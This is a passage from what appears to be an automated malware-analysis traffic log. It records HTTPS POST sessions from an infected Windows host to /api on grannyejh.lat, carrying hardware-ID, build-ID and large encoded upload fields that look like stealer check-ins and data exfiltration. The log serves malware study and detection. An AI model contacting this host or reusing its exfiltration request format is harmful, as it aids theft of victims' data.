                                                                                                                                                                                                                                                          2024-12-19 13:27:03 UTC15331OUTData Raw: ec 9b 44 49 72 97 58 b9 6c e4 d8 b4 1e 3b 28 0d 9e 70 d0 cf 49 c4 1e ba 6a 11 68 8a e7 ad 23 05 e6 00 07 dd d5 f3 c1 c7 b5 68 7c ed 47 cb 86 c9 c6 bf 63 94 f0 9b 7f fd bb 32 d3 37 c9 dc ec ac e4 6d f0 c7 d1 fb b9 a3 bc 3d af 42 97 b9 82 20 fa 4a a0 82 ca 09 55 f0 79 91 ea 80 d8 68 e7 00 fb fb d1 ab 6f 04 c1 cc 55 1c 60 de e2 45 b9 9f e5 90 22 04 4a 42 88 7a 1f 01 2b c9 89 0f 3e 3d 7d 87 77 ba b7 53 6c aa 01 0b 77 86 fb 1d 07 d4 b1 31 34 2c 9b 5e 0c 92 27 34 f0 5e 8d f3 e6 9c 20 db 95 2b 31 2a d7 5e 5d 22 4a a3 bf fe da 28 7f e5 f7 fe 55 e3 8f 96 cf e8 5b bd 61 eb 46 14 be 50 01 e1 43 c5 31 71 4f d7 9f 48 af 6b 84 7f f8 eb e9 bb 89 f9 70 0d 13 dd 7d 3c 58 4d 4c e6 61 61 eb 4b 93 10 ab 5d 2b 86 fe 5b e3 ae 72 40 01 77 33 30 ed 6f 28 fb 18 76 be ff 60 db 01
                                                                                                                                                                                                                                                          Data Ascii: DIrXl;(pIjh#h|Gc27m=B JUyhoU`E"JBz+>=}wSlw14,^'4^ +1*^]"J(U[aFPC1qOHkp}<XMLaaK]+[r@w30o(v`
                                                                                                                                                                                                                                                          2024-12-19 13:27:03 UTC15331OUTData Raw: d4 48 0c 0f b5 cf 58 54 49 20 5e 3f af 95 82 35 3e a5 09 b0 7b 2f e2 cc 69 16 d6 b7 3b 32 7e 09 1e a3 49 7f 33 83 01 44 a2 7c a3 11 c9 60 c5 1e 21 ce f7 bc 33 cd 8e 10 85 b4 25 68 00 61 17 ef a0 a8 4c 38 48 a0 3c 04 36 8a 34 0c f0 5f c5 43 2e 12 03 b7 b3 b4 77 9c dd 61 96 9d 59 ce 91 00 b7 69 bb 59 9d fb 72 de 33 3e ac 87 df 4a 5f 18 fa f0 9a 3c bd 61 1b 93 49 b5 1b db ec c4 56 ff b6 74 a3 ef db ae 00 f8 ef 95 11 34 17 96 f9 00 28 3d 90 49 6a 30 49 f5 bd 53 43 a8 20 ec 20 37 17 d8 a8 d4 ea 72 2d 41 72 cd 12 73 17 1a fd 7e 32 a9 08 c8 f2 be df 3f ca 5c 59 14 1b 06 4c b0 42 40 de f6 db 84 d8 ca 02 2d 55 a5 77 36 ad 9d a8 53 e2 5b 47 84 6e 9c c6 25 58 99 28 88 41 8d fa 69 61 fd 28 ed 1c 9f 21 09 d0 71 ab c0 80 a5 01 ce e8 1d 8b 6d 52 2d 34 b1 08 c4 8f d4 4c
                                                                                                                                                                                                                                                          Data Ascii: HXTI ^?5>{/i;2~I3D|`!3%haL8H<64_C.waYiYr3>J_<aIVt4(=Ij0ISC 7r-Ars~2?\YLB@-Uw6S[Gn%X(Aia(!qmR-4L
                                                                                                                                                                                                                                                          2024-12-19 13:27:03 UTC15331OUTData Raw: af 17 e5 41 0b 79 c0 16 07 3f 45 9a f9 20 99 74 e4 a6 20 90 fc f3 ea 79 d9 54 8f 4a cf 2f 99 82 c6 88 75 67 03 2e 1a b3 ce dd 4f d3 0b 40 91 2b ec 29 49 9b d9 bf 4f 54 0f 88 00 ab 03 a4 99 ff 73 9c 2d 49 01 97 81 fd 85 87 76 fe eb af b1 9d 28 be 29 47 f7 f1 40 29 45 5e 14 d6 7b a3 89 3c 2b 7d f1 0a a3 2b c2 48 c6 71 8c 7b 28 6c 5d 97 48 a4 90 ff 56 f4 32 de b2 3e 64 e5 0e b5 dd 29 f8 f2 3b 7a 58 fc 48 94 4c 11 9c d3 62 aa 27 ca 61 d3 4f 96 e5 87 a8 77 2b 94 22 87 5a 12 de aa eb be f6 5f 97 77 de 26 02 3c 8c df 6e 4d 4e e6 7e 85 18 ea e6 a1 40 ef 21 a0 64 a6 55 77 56 95 6b 61 ae 89 22 6c e7 13 76 12 de 5d a4 03 5a 15 69 ab f9 e6 ef a3 a6 ed a0 41 2c 51 74 2f 89 4e 54 70 db d4 72 ab 85 06 3f a3 bd 55 d7 6c ce 65 4a 51 3f 46 50 6f dd 61 88 12 70 3f b7 27 62
                                                                                                                                                                                                                                                          Data Ascii: Ay?E t yTJ/ug.O@+)IOTs-Iv()G@)E^{<+}+Hq{(l]HV2>d);zXHLb'aOw+"Z_w&<nMN~@!dUwVka"lv]ZiA,Qt/NTpr?UleJQ?FPoap?'b
                                                                                                                                                                                                                                                          2024-12-19 13:27:03 UTC15331OUTData Raw: 45 fa 5e ad 77 f1 30 e3 fd 4d 6b 5c 09 cb 94 07 43 bf c2 9f 13 ae ef a2 ae ac 93 3d 7e a4 39 3d a8 3a 2a c5 ea 7f 58 78 42 24 f4 13 c4 b4 46 80 4d fb 62 34 1e ee 02 6d c5 c1 52 2c ad 42 05 43 4c e8 85 95 7d 8e 74 cb e7 0f ab 62 a4 17 3a e8 f0 0a 18 96 db 02 52 72 f1 f8 1d 92 5b 64 3c d1 ed 37 46 ef 69 15 f4 38 87 ec 0d 59 fb 9d 54 68 a6 18 7c a0 22 f4 db df 19 5e 07 02 11 88 04 bb de 7c 2d 45 01 8b 6f b0 5d ba 0b 97 a2 37 f0 a9 fc 1f e9 57 05 5e d9 83 f2 20 f0 85 33 60 d9 8e 38 5e e6 99 02 66 2f c6 ab 4b 72 33 00 07 f8 78 c7 88 d4 2b dc 10 c5 cd b5 e0 08 9b 59 65 c9 7b 8e 45 5d 5a 42 48 7e 61 d5 fe 91 91 b4 7b 02 f1 aa 61 3d 6d 22 39 5f 69 bb d2 e4 62 93 49 af 35 50 7c 98 b0 f3 ab 5d 8e 52 55 fd 07 54 48 ba 18 b5 eb 9f b2 0f 1e ee 4d 8a a0 fd 27 13 59 21
                                                                                                                                                                                                                                                          Data Ascii: E^w0Mk\C=~9=:*XxB$FMb4mR,BCL}tb:Rr[d<7Fi8YTh|"^|-Eo]7W^ 3`8^f/Kr3x+Ye{E]ZBH~a{a=m"9_ibI5P|]RUTHM'Y!
                                                                                                                                                                                                                                                          2024-12-19 13:27:06 UTC1131INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:27:06 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=dt1dhdumjq5ije376hl5urs3a4; expires=Mon, 14 Apr 2025 07:13:44 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VAhFovFb%2F7WdvaJJbijfmFd2sjNWPzO%2BfV8gYMy7t3Bl%2BmzxegEX2ZEmqirFcz7ppzKXxCqmlTFeiUsWqZNhjb6xYqjdj4%2BK%2FFpj%2B9sGxiDLHl62dOfGwEOx2UI2l0kT"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                          CF-RAY: 8f47ba559dc1c3fd-EWR
                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1643&min_rtt=1637&rtt_var=627&sent=313&recv=594&lost=0&retrans=0&sent_bytes=2831&recv_bytes=576003&delivery_rate=1727810&cwnd=178&unsent_bytes=0&cid=26506574ef0078fc&ts=3183&x=0"


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                          42192.168.2.450219172.67.179.109443
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-19 13:27:05 UTC261OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Content-Length: 47
                                                                                                                                                                                                                                                          Host: grannyejh.lat
                                                                                                                                                                                                                                                          2024-12-19 13:27:05 UTC47OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d
                                                                                                                                                                                                                                                          Data Ascii: act=recive_message&ver=4.0&lid=PsFKDg--pablo&j=
                                                                                                                                                                                                                                                          2024-12-19 13:27:05 UTC1115INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:27:05 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=g8flsit6a1dildcorkj3b8rb32; expires=Mon, 14 Apr 2025 07:13:44 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=31I5EdcW%2FdmtipnUIVRPQB3gLqSdNsplZLdszfjcm4zXAntMB1yvXjdc8MarzBRne%2FTCYiNBFiaSucKFtQYteCHn1VlRkbVaFVU4XL7n0NNAc5uitQkBEu6iz6fFSmII"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                          CF-RAY: 8f47ba62290a434a-EWR
                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1775&min_rtt=1758&rtt_var=694&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2829&recv_bytes=944&delivery_rate=1537651&cwnd=228&unsent_bytes=0&cid=e542807ccbd1bc91&ts=787&x=0"
                                                                                                                                                                                                                                                          2024-12-19 13:27:05 UTC254INData Raw: 31 34 38 64 0d 0a 65 2f 57 56 63 47 68 79 6e 39 47 74 34 71 36 73 62 59 39 78 34 36 69 79 64 4a 57 4e 65 77 54 52 6c 38 6a 47 47 4e 52 58 77 64 34 41 31 2b 4e 53 55 6b 61 7a 38 39 36 48 6a 4a 59 5a 2f 51 53 47 68 4a 41 56 38 61 39 42 59 72 44 37 75 36 4d 30 39 69 47 73 2f 45 47 54 39 42 77 62 46 37 50 7a 79 4a 71 4d 6c 6a 62 30 55 34 62 47 6b 45 36 33 36 42 46 6d 73 50 75 71 70 33 4f 37 4a 36 32 39 45 35 6e 79 47 41 30 52 2b 37 44 42 6a 38 76 4a 43 4f 34 62 6a 63 48 66 48 50 69 76 56 79 61 30 37 65 72 38 4f 70 6b 79 74 62 38 32 6c 4f 59 62 53 67 2b 7a 71 6f 2b 48 77 49 35 58 72 52 43 47 79 74 34 53 38 65 59 54 62 4c 6e 7a 71 36 4a 79 70 44 36 6e 74 68 4f 58 38 52 6b 48 47 4f 2b 39 79 34 6a 41 7a 77 4c 75 55 38 2b 4b 31 77 36 33 74 31 6b 31 67 66 61 37
                                                                                                                                                                                                                                                          Data Ascii: 148de/WVcGhyn9Gt4q6sbY9x46iydJWNewTRl8jGGNRXwd4A1+NSUkaz896HjJYZ/QSGhJAV8a9BYrD7u6M09iGs/EGT9BwbF7PzyJqMljb0U4bGkE636BFmsPuqp3O7J629E5nyGA0R+7DBj8vJCO4bjcHfHPivVya07er8Opkytb82lOYbSg+zqo+HwI5XrRCGyt4S8eYTbLnzq6JypD6nthOX8RkHGO+9y4jAzwLuU8+K1w63t1k1gfa7
                                                                                                                                                                                                                                                          2024-12-19 13:27:05 UTC1369INData Raw: 74 57 2b 37 4a 61 58 38 42 74 6e 75 55 67 30 63 76 65 75 50 69 4d 44 41 43 75 34 63 68 73 76 51 42 50 6a 76 47 6d 36 37 38 61 43 72 64 62 6b 37 71 62 73 52 6e 76 41 64 44 52 6a 37 76 4d 7a 41 67 6f 34 49 39 56 50 5a 69 76 41 47 39 4f 77 4e 61 36 4b 31 74 65 70 6a 39 6a 4b 76 2f 45 48 58 38 52 77 4c 48 66 32 68 78 34 76 48 79 78 33 6d 47 6f 7a 48 30 42 76 39 34 42 70 6d 74 50 2b 67 71 33 43 79 4f 4b 36 36 47 5a 65 33 58 45 6f 58 35 66 4f 58 77 4f 2f 4c 48 2b 6f 66 6c 34 6a 71 56 75 69 68 41 43 61 30 2b 65 72 38 4f 72 34 77 6f 4c 38 53 6d 50 51 61 41 51 4c 39 6f 63 6d 4e 79 64 77 4a 36 42 32 4c 79 63 49 63 2b 65 6b 61 62 37 6a 38 72 36 4e 2b 39 6e 76 6a 75 77 48 58 72 31 49 72 48 66 61 2f 78 5a 66 4d 6a 68 43 6a 43 73 48 4e 33 46 61 76 72 78 31 6e 74 2f 53
                                                                                                                                                                                                                                                          Data Ascii: tW+7JaX8BtnuUg0cveuPiMDACu4chsvQBPjvGm678aCrdbk7qbsRnvAdDRj7vMzAgo4I9VPZivAG9OwNa6K1tepj9jKv/EHX8RwLHf2hx4vHyx3mGozH0Bv94BpmtP+gq3CyOK66GZe3XEoX5fOXwO/LH+ofl4jqVuihACa0+er8Or4woL8SmPQaAQL9ocmNydwJ6B2LycIc+ekab7j8r6N+9nvjuwHXr1IrHfa/xZfMjhCjCsHN3Favrx1nt/S
                                                                                                                                                                                                                                                          2024-12-19 13:27:05 UTC1369INData Raw: 6e 58 37 2f 44 4f 55 34 78 45 41 55 73 69 77 77 59 37 4c 32 45 2f 79 58 5a 69 4b 31 78 71 33 74 31 6c 72 73 76 32 73 74 6e 57 37 4e 71 32 79 46 70 4c 34 47 67 6f 51 38 4c 62 4c 69 38 66 4e 41 75 6b 42 69 38 72 59 45 2f 62 6c 45 79 62 39 74 61 32 38 4f 75 35 31 6b 71 73 53 31 63 49 52 42 42 37 36 70 59 2b 66 67 74 64 50 36 68 2f 42 6b 70 41 62 2f 2b 6f 63 61 62 4c 2f 70 4b 46 77 75 6a 32 74 76 77 75 59 38 78 49 47 47 50 65 2b 77 59 54 45 78 77 54 6d 46 59 48 4c 32 6c 61 35 72 78 35 2b 38 36 33 71 6b 48 32 36 4f 4b 7a 2b 4c 4a 54 35 48 41 30 47 76 61 79 42 6d 59 7a 4a 41 36 31 4c 77 63 62 5a 46 76 7a 6c 48 57 61 30 2b 4b 2b 6e 66 62 55 34 70 4c 59 58 6b 50 4d 65 41 78 33 37 73 38 69 45 79 64 77 4b 35 42 2b 4e 69 70 35 57 38 50 64 5a 50 76 50 61 72 62 4a 35
                                                                                                                                                                                                                                                          Data Ascii: nX7/DOU4xEAUsiwwY7L2E/yXZiK1xq3t1lrsv2stnW7Nq2yFpL4GgoQ8LbLi8fNAukBi8rYE/blEyb9ta28Ou51kqsS1cIRBB76pY+fgtdP6h/BkpAb/+ocabL/pKFwuj2tvwuY8xIGGPe+wYTExwTmFYHL2la5rx5+863qkH26OKz+LJT5HA0GvayBmYzJA61LwcbZFvzlHWa0+K+nfbU4pLYXkPMeAx37s8iEydwK5B+Nip5W8PdZPvParbJ5
                                                                                                                                                                                                                                                          2024-12-19 13:27:05 UTC1369INData Raw: 55 4c 6d 66 6b 62 42 78 62 31 74 4d 47 4e 78 38 67 45 36 68 53 48 78 39 67 62 38 75 77 59 59 72 6e 6e 71 61 39 77 75 7a 2f 6a 38 6c 6d 51 37 31 4a 53 55 4e 71 2f 35 70 44 58 33 42 6d 74 44 4d 2f 54 6b 42 48 37 72 30 45 6d 73 50 71 6a 71 33 4b 2b 4f 71 79 34 46 35 48 78 48 77 38 66 39 36 48 48 6a 73 48 46 41 4f 59 42 67 63 66 55 47 76 50 6e 45 6d 7a 7a 75 2b 71 6a 59 76 5a 74 34 34 6b 55 6d 50 63 52 48 46 44 69 2f 64 62 41 79 38 4a 50 74 56 4f 4e 78 4e 41 5a 2b 2b 4d 53 62 72 4c 35 70 4b 4e 2f 76 7a 32 72 72 68 69 54 2f 78 4d 45 48 2f 79 33 79 6f 58 49 79 51 76 72 48 4d 47 45 6b 42 48 76 72 30 45 6d 6e 4e 4b 66 35 6c 75 4d 64 62 7a 79 41 4e 66 77 48 6b 70 49 76 62 2f 4d 6a 4d 54 42 43 65 51 66 69 38 50 62 47 76 7a 72 46 57 2b 32 38 36 75 68 66 37 63 78 72
                                                                                                                                                                                                                                                          Data Ascii: ULmfkbBxb1tMGNx8gE6hSHx9gb8uwYYrnnqa9wuz/j8lmQ71JSUNq/5pDX3BmtDM/TkBH7r0EmsPqjq3K+Oqy4F5HxHw8f96HHjsHFAOYBgcfUGvPnEmzzu+qjYvZt44kUmPcRHFDi/dbAy8JPtVONxNAZ++MSbrL5pKN/vz2rrhiT/xMEH/y3yoXIyQvrHMGEkBHvr0EmnNKf5luMdbzyANfwHkpIvb/MjMTBCeQfi8PbGvzrFW+286uhf7cxr
                                                                                                                                                                                                                                                          2024-12-19 13:27:05 UTC908INData Raw: 36 48 51 49 59 39 4c 4c 4c 68 63 48 49 41 2b 63 53 68 73 54 65 48 72 65 68 57 57 47 72 74 66 4c 6b 57 36 59 75 73 61 6f 55 74 76 6f 64 53 67 2b 7a 71 6f 2b 48 77 49 35 58 72 52 71 54 7a 74 30 45 2f 75 67 58 61 62 44 6e 71 36 6c 78 70 44 4b 73 75 42 36 62 38 52 30 4d 45 66 69 35 77 34 66 4a 78 51 44 68 55 38 2b 4b 31 77 36 33 74 31 6c 49 75 4f 61 39 70 33 53 39 49 37 6a 38 42 74 6e 75 55 67 30 63 76 65 75 50 67 38 66 46 43 2b 30 66 67 63 37 64 46 75 58 67 48 6d 47 36 2f 72 69 75 66 62 45 2b 71 37 63 57 6b 65 55 65 42 41 4c 34 6f 64 33 41 67 6f 34 49 39 56 50 5a 69 75 59 52 35 2f 38 61 4a 49 4c 6a 71 62 4a 78 75 7a 6e 6a 6f 31 65 4f 74 78 55 47 55 4b 58 7a 79 59 2f 46 7a 51 44 73 47 6f 33 48 31 52 2f 79 37 68 39 69 75 66 2b 71 6f 6e 79 33 4d 4b 6d 2f 47 4a
                                                                                                                                                                                                                                                          Data Ascii: 6HQIY9LLLhcHIA+cShsTeHrehWWGrtfLkW6YusaoUtvodSg+zqo+HwI5XrRqTzt0E/ugXabDnq6lxpDKsuB6b8R0MEfi5w4fJxQDhU8+K1w63t1lIuOa9p3S9I7j8BtnuUg0cveuPg8fFC+0fgc7dFuXgHmG6/riufbE+q7cWkeUeBAL4od3Ago4I9VPZiuYR5/8aJILjqbJxuznjo1eOtxUGUKXzyY/FzQDsGo3H1R/y7h9iuf+qony3MKm/GJ
                                                                                                                                                                                                                                                          2024-12-19 13:27:05 UTC1369INData Raw: 33 34 38 66 0d 0a 63 72 46 44 4f 63 63 68 73 7a 55 46 76 7a 6f 46 32 43 32 2f 71 50 6b 4e 50 59 79 75 2f 78 42 31 39 45 78 47 41 4c 50 76 63 79 62 6a 4e 46 42 39 46 4f 47 78 70 42 4f 74 2b 51 52 61 61 48 77 6f 36 78 2b 76 7a 57 6e 74 68 53 51 39 78 63 48 46 66 6d 39 79 34 66 4d 77 67 44 71 47 34 37 4f 30 42 6d 33 6f 56 6c 68 71 37 58 79 35 46 71 39 49 34 4b 79 45 6f 57 33 44 55 51 4a 76 62 54 44 77 4a 53 4f 41 65 51 53 69 63 54 63 48 76 50 39 47 57 32 36 2b 71 75 72 65 72 55 30 71 62 51 4c 6b 66 63 5a 41 68 66 31 74 38 47 53 7a 63 46 50 6f 31 4f 47 30 70 42 4f 74 39 34 50 59 62 54 36 36 49 31 39 72 54 53 70 76 78 4b 62 74 77 31 45 43 62 32 30 77 38 43 55 6a 67 4c 68 48 6f 58 59 33 42 62 33 35 68 35 73 6f 66 71 6c 71 58 6d 32 4d 4c 47 39 43 35 6a 38 46 77
                                                                                                                                                                                                                                                          Data Ascii: 348fcrFDOcchszUFvzoF2C2/qPkNPYyu/xB19ExGALPvcybjNFB9FOGxpBOt+QRaaHwo6x+vzWnthSQ9xcHFfm9y4fMwgDqG47O0Bm3oVlhq7Xy5Fq9I4KyEoW3DUQJvbTDwJSOAeQSicTcHvP9GW26+qurerU0qbQLkfcZAhf1t8GSzcFPo1OG0pBOt94PYbT66I19rTSpvxKbtw1ECb20w8CUjgLhHoXY3Bb35h5sofqlqXm2MLG9C5j8Fw
                                                                                                                                                                                                                                                          2024-12-19 13:27:05 UTC1369INData Raw: 33 59 76 65 78 51 66 75 48 59 6e 44 30 42 6a 33 37 68 52 6d 38 37 76 71 6f 32 4c 32 62 65 4f 5a 4f 6f 44 68 47 45 67 7a 36 71 58 46 68 38 44 59 42 4f 77 51 6c 38 66 41 56 72 6d 76 43 47 47 69 74 66 4b 79 61 71 45 79 76 50 49 41 31 2f 41 65 53 6b 69 39 75 4d 43 4f 77 63 55 4c 35 42 61 4a 79 64 55 54 2f 65 4d 56 5a 37 76 38 6f 4b 46 2f 73 44 2b 67 73 68 61 57 2b 78 59 44 48 76 54 7a 67 63 44 4c 31 6b 2b 31 55 37 66 61 31 77 37 36 2f 31 74 55 73 4f 53 37 73 58 65 6d 4d 2b 47 54 47 70 76 30 46 77 30 41 76 61 79 42 6d 59 7a 4a 41 36 31 4c 77 63 72 55 47 76 54 6f 46 32 6d 2b 2b 71 32 76 64 62 77 37 73 62 4d 63 6e 2f 73 61 42 77 4c 33 75 64 32 4a 78 63 4d 42 35 51 47 43 69 70 35 57 38 50 64 5a 50 76 50 48 6f 4b 64 32 6f 44 69 73 2f 41 62 5a 37 6c 49 4e 48 4c 33
                                                                                                                                                                                                                                                          Data Ascii: 3YvexQfuHYnD0Bj37hRm87vqo2L2beOZOoDhGEgz6qXFh8DYBOwQl8fAVrmvCGGitfKyaqEyvPIA1/AeSki9uMCOwcUL5BaJydUT/eMVZ7v8oKF/sD+gshaW+xYDHvTzgcDL1k+1U7fa1w76/1tUsOS7sXemM+GTGpv0Fw0AvayBmYzJA61LwcrUGvToF2m++q2vdbw7sbMcn/saBwL3ud2JxcMB5QGCip5W8PdZPvPHoKd2oDis/AbZ7lINHL3
                                                                                                                                                                                                                                                          2024-12-19 13:27:05 UTC1369INData Raw: 49 35 42 72 52 7a 42 6b 75 6c 57 76 36 38 6d 4b 50 50 74 36 76 77 36 67 7a 61 74 73 68 36 42 35 6c 38 70 42 2b 75 35 31 4d 4c 71 79 52 37 6b 42 59 7a 59 6b 46 69 33 36 56 6b 2b 34 37 76 71 6f 47 76 32 62 66 50 75 51 73 4b 6b 52 56 70 43 34 76 33 57 77 4e 71 4f 56 37 39 64 77 64 69 51 54 72 65 6f 47 6e 53 68 38 36 6d 79 65 66 45 4c 6e 5a 77 53 67 66 59 66 41 52 7a 44 6a 64 71 44 77 73 41 49 2b 77 4c 42 68 4a 41 5a 74 37 63 67 4a 76 75 31 6c 65 6f 36 72 6e 58 37 2f 43 79 55 2b 52 77 4e 42 75 7a 2b 37 34 76 61 7a 77 4c 6d 48 38 50 4c 33 51 62 77 72 31 63 6d 74 62 58 79 39 44 54 32 4d 62 4c 38 51 63 65 6c 53 56 39 44 71 75 4f 64 6e 34 4c 58 54 2f 74 54 32 5a 69 65 56 75 57 76 51 53 62 30 39 72 69 32 66 4c 55 6a 6f 50 73 6e 71 64 63 5a 42 68 50 78 73 73 6a 41
                                                                                                                                                                                                                                                          Data Ascii: I5BrRzBkulWv68mKPPt6vw6gzatsh6B5l8pB+u51MLqyR7kBYzYkFi36Vk+47vqoGv2bfPuQsKkRVpC4v3WwNqOV79dwdiQTreoGnSh86myefELnZwSgfYfARzDjdqDwsAI+wLBhJAZt7cgJvu1leo6rnX7/CyU+RwNBuz+74vazwLmH8PL3Qbwr1cmtbXy9DT2MbL8QcelSV9DquOdn4LXT/tT2ZieVuWvQSb09ri2fLUjoPsnqdcZBhPxssjA
                                                                                                                                                                                                                                                          2024-12-19 13:27:05 UTC1369INData Raw: 56 44 30 35 47 46 52 61 43 2f 53 33 6e 39 37 4f 71 79 4f 75 35 6e 37 66 77 4c 31 36 39 53 54 52 50 76 6f 63 6d 44 32 73 31 49 30 79 32 6e 79 64 63 51 39 4f 45 4f 64 2f 48 61 71 61 39 32 75 6a 4b 31 67 69 65 43 39 42 77 45 46 2b 75 69 6a 38 36 4d 77 55 2b 31 4b 73 48 62 32 68 47 37 70 31 56 33 6f 50 75 68 73 6e 33 32 43 75 33 38 41 64 65 76 55 6a 38 54 38 37 33 49 6c 74 32 44 4b 65 34 55 68 38 6e 65 41 65 61 76 56 79 61 31 74 66 4c 32 4e 50 59 78 73 76 78 42 78 36 56 4a 58 30 4f 71 34 35 32 66 67 74 64 50 2b 31 50 5a 6d 5a 35 57 35 61 39 42 4a 76 54 37 70 36 56 35 75 44 61 78 72 68 2b 55 34 52 46 4e 4c 73 4f 57 77 6f 33 4a 77 41 6a 54 4c 61 44 41 77 42 76 34 36 43 64 59 68 4f 53 74 74 44 69 51 4e 72 57 2f 57 64 6d 33 43 6b 70 49 76 5a 4c 46 6b 4d 48 42 43
                                                                                                                                                                                                                                                          Data Ascii: VD05GFRaC/S3n97OqyOu5n7fwL169STRPvocmD2s1I0y2nydcQ9OEOd/Haqa92ujK1gieC9BwEF+uij86MwU+1KsHb2hG7p1V3oPuhsn32Cu38AdevUj8T873Ilt2DKe4Uh8neAeavVya1tfL2NPYxsvxBx6VJX0Oq452fgtdP+1PZmZ5W5a9BJvT7p6V5uDaxrh+U4RFNLsOWwo3JwAjTLaDAwBv46CdYhOSttDiQNrW/Wdm3CkpIvZLFkMHBC


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                          43192.168.2.450222172.67.179.109443
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-19 13:27:07 UTC269OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=H45DZRR7
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Content-Length: 18103
                                                                                                                                                                                                                                                          Host: grannyejh.lat
                                                                                                                                                                                                                                                          2024-12-19 13:27:07 UTC15331OUTData Raw: 2d 2d 48 34 35 44 5a 52 52 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 39 41 45 46 43 37 34 35 35 32 33 32 41 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 48 34 35 44 5a 52 52 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 48 34 35 44 5a 52 52 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 48 34 35 44 5a 52 52 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74
                                                                                                                                                                                                                                                          Data Ascii: --H45DZRR7Content-Disposition: form-data; name="hwid"4D9AEFC7455232ACAC8923850305D13E--H45DZRR7Content-Disposition: form-data; name="pid"2--H45DZRR7Content-Disposition: form-data; name="lid"PsFKDg--pablo--H45DZRR7Content-Disposit
